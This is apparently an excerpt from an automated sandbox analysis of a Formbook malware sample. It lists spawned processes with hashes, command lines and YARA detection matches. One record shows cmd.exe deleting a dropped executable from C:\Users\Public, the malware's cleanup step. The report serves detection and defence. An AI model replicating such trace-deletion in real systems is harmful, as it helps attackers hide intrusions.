• Rule: Formbook, Description: detect Formbook in memory, Source: 0000000A.00000000.429302805.00000000079AA000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:high

General

Start time:18:20:19
Start date:27/10/2021
Path:C:\Windows\SysWOW64\wlanext.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\wlanext.exe
Imagebase:0xda0000
File size:78848 bytes
MD5 hash:CD1ED9A48316D58513D8ECB2D55B5C04
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.559434313.00000000009B0000.00000040.00020000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.559434313.00000000009B0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.559434313.00000000009B0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
Reputation:moderate

General

Start time:18:20:24
Start date:27/10/2021
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:/c del 'C:\Users\Public\eVJOpc.exe'
Imagebase:0xd80000
File size:232960 bytes
MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:high

General

Start time:18:20:26
Start date:27/10/2021
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7f20f0000
File size:625664 bytes
MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language

Disassembly

Code Analysis